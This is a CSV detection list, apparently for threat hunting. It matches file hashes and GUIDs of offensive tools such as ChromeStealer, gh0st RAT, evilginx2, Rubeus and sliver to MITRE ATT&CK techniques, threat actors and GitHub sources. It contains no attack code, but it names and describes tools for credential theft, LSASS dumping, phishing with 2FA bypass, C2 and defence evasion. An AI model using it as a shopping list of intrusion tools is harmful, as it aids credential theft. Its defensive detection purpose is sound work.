"*64d0026295c3c887bbcb256967aae006f4df254a2bc9418f9a1dc30fd6115ee1*",".{0,1000}64d0026295c3c887bbcb256967aae006f4df254a2bc9418f9a1dc30fd6115ee1.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","28005"
"*64d2173109cdc67df6e9e15a275b4ed0b5488397c290b996ffd3ed445f361b79*",".{0,1000}64d2173109cdc67df6e9e15a275b4ed0b5488397c290b996ffd3ed445f361b79.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#filehash","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","28007"
"*64D26B66-8A59-0724-007F-9001C4F472A2*",".{0,1000}64D26B66\-8A59\-0724\-007F\-9001C4F472A2.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","28008"
"*64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99*",".{0,1000}64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","28009"
"*64D84D51-F462-4A24-85EA-845C97238C09*",".{0,1000}64D84D51\-F462\-4A24\-85EA\-845C97238C09.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#GUIDproject","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","28011"
"*64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310*",".{0,1000}64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28012"
"*64e8b1efc560e837ac87e1fe231b92781d5eb9dfc3688d10fd38ed32f5556640*",".{0,1000}64e8b1efc560e837ac87e1fe231b92781d5eb9dfc3688d10fd38ed32f5556640.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28013"
"*64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24*",".{0,1000}64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28014"
"*64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8*",".{0,1000}64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28015"
"*64f235e5a231dcf5f1fd79b2887c9c2f3be577ca71b424a59c987d778d580d11*",".{0,1000}64f235e5a231dcf5f1fd79b2887c9c2f3be577ca71b424a59c987d778d580d11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28016"
"*64f2cdd3e097e191e0395ae0ac0f0f443387ab3a881a2f6baddfc53cd7bfb93f*",".{0,1000}64f2cdd3e097e191e0395ae0ac0f0f443387ab3a881a2f6baddfc53cd7bfb93f.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28017"
"*64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27*",".{0,1000}64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","28018"
"*64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27*",".{0,1000}64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28019"
"*64fd910fe28fc9c7c8c1ee35cbf5af6b23141bdddeb22ed5d3ecf3902917680b*",".{0,1000}64fd910fe28fc9c7c8c1ee35cbf5af6b23141bdddeb22ed5d3ecf3902917680b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28020"
"*64fe21c5033e01c0f5c45a9d0f990d6d4b5ae2f20416b65787385844332411*",".{0,1000}64fe21c5033e01c0f5c45a9d0f990d6d4b5ae2f20416b65787385844332411.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28021"
"*6500d2030465216b60c086fbbbb4b52ec043473c802edf71d9b8277ee4b52efe*",".{0,1000}6500d2030465216b60c086fbbbb4b52ec043473c802edf71d9b8277ee4b52efe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28022"
"*651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e*",".{0,1000}651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28023"
"*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28026"
"*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#filehash","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","28027"
"*65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5*",".{0,1000}65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","28028"
"*651834f5cb6e7559c8be9de345396ad4c034d08fa92169f374404989a0590c5f*",".{0,1000}651834f5cb6e7559c8be9de345396ad4c034d08fa92169f374404989a0590c5f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28030"
"*651e286fdf6d57e43df7aeb51d819999ecc28621bdefb834a5ef57d41dcf7336*",".{0,1000}651e286fdf6d57e43df7aeb51d819999ecc28621bdefb834a5ef57d41dcf7336.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28032"
"*651e8488f87c2dd4524da1169f3abca80e165a6cc22f1355163a0c0e713fb0f6*",".{0,1000}651e8488f87c2dd4524da1169f3abca80e165a6cc22f1355163a0c0e713fb0f6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28033"
"*65212e7e24bf5e11c584e0e222f02cd3695d1266a8ce024f91b890359eefdd14*",".{0,1000}65212e7e24bf5e11c584e0e222f02cd3695d1266a8ce024f91b890359eefdd14.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28034"
"*6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115*",".{0,1000}6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28035"
"*652c0669b041362a1ece950a33752cca4940146934d651c04f992b8f11b0fba0*",".{0,1000}652c0669b041362a1ece950a33752cca4940146934d651c04f992b8f11b0fba0.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","28036"
"*6536EBEC-014E-4D6B-97BE-223137694CA8*",".{0,1000}6536EBEC\-014E\-4D6B\-97BE\-223137694CA8.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","28037"
"*6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936*",".{0,1000}6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28038"
"*654685d39d4c33cb74a990013bdf18883d774c609a155a6461bd76e93167792c*",".{0,1000}654685d39d4c33cb74a990013bdf18883d774c609a155a6461bd76e93167792c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28039"
"*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1","10","10","N/A","N/A","N/A","N/A","28040"
"*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","28041"
"*65514a7171c001cd3bcc99f90efca058fe8b22ba896194eb60ea2249fbce66ee*",".{0,1000}65514a7171c001cd3bcc99f90efca058fe8b22ba896194eb60ea2249fbce66ee.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","28042"
"*6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395*",".{0,1000}6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28043"
"*655d3c2fe42a6d9d46250419d7cd3205efa86f18eb71f9e6285b652ab2fefbde*",".{0,1000}655d3c2fe42a6d9d46250419d7cd3205efa86f18eb71f9e6285b652ab2fefbde.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28044"
"*6563686f2048656c6c6f204261636b646f6f72*",".{0,1000}6563686f2048656c6c6f204261636b646f6f72.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","28045"
"*656761faa342911d398af21edaf085f978ffa53a6bf3919763dfa82aba2301f1*",".{0,1000}656761faa342911d398af21edaf085f978ffa53a6bf3919763dfa82aba2301f1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","28047"
"*65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632*",".{0,1000}65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28048"
"*6569a4f09ccdf814bf1697e7e35975c065909df9184eb49822a34f7a029d20da*",".{0,1000}6569a4f09ccdf814bf1697e7e35975c065909df9184eb49822a34f7a029d20da.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","28049"
"*65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1*",".{0,1000}65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28052"
"*6581e5fa0774f61a2d4ebdb019b69fbb1ede68bc6038260e787a0cdddc09ff84*",".{0,1000}6581e5fa0774f61a2d4ebdb019b69fbb1ede68bc6038260e787a0cdddc09ff84.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28054"
"*658318b022bfa0408ef73d5a1333cdfc5fec5295a0aaa75c81b54f46b5d87ad8*",".{0,1000}658318b022bfa0408ef73d5a1333cdfc5fec5295a0aaa75c81b54f46b5d87ad8.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","28055"
"*6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9*",".{0,1000}6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28056"
"*65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474*",".{0,1000}65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28057"
"*65876ca1dde6923447642de1dbcc198b7f5bbe53c26d7eae7f1d675cb5f68774*",".{0,1000}65876ca1dde6923447642de1dbcc198b7f5bbe53c26d7eae7f1d675cb5f68774.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28058"
"*6588c43e708dddb11349064d65b892ca0dcd746afac891fdab84ebd1b699f86d*",".{0,1000}6588c43e708dddb11349064d65b892ca0dcd746afac891fdab84ebd1b699f86d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28059"
"*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","#GUIDproject","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28060"
"*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","#GUIDproject","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28061"
